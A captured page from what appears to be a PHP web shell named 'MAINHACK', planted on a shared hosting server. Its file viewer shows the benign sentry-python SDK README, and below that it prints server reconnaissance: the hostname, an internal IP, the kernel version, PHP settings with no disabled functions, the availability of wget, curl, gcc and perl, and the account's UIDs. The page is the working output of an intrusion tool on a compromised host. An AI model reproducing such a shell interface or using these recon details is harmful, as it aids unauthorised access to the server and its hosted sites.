[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: README.md
File is not writable. Editing disabled.
<p align="center"> <a href="https://sentry.io" target="_blank" align="center"> <img src="https://sentry-brand.storage.googleapis.com/sentry-logo-black.png" width="280"> </a> </p> # sentry-python - Sentry SDK for Python [](https://travis-ci.com/getsentry/sentry-python) [](https://pypi.python.org/pypi/sentry-sdk) This is the next line of the Python SDK for [Sentry](http://sentry.io/), intended to replace the `raven` package on PyPI. ```python from sentry_sdk import init, capture_message init("mydsn@sentry.io/123") capture_message("Hello World") # Will create an event. raise ValueError() # Will also create an event. ``` To learn more about how to use the SDK: - [Getting started with the new SDK](https://docs.sentry.io/quickstart/?platform=python) - [Configuration options](https://docs.sentry.io/error-reporting/configuration/?platform=python) - [Setting context (tags, user, extra information)](https://docs.sentry.io/enriching-error-data/context/?platform=python) - [Integrations](https://docs.sentry.io/platforms/python/) Are you coming from raven-python? - [Cheatsheet: Migrating to the new SDK from Raven](https://forum.sentry.io/t/switching-to-sentry-python/4733) To learn about internals: - [API Reference (using pdoc)](https://getsentry.github.io/sentry-python/) - [API Reference (using sphinx)](https://www.pydoc.io/search/?package=sentry-sdk) # License Licensed under the BSD license, see `LICENSE`
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.78 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A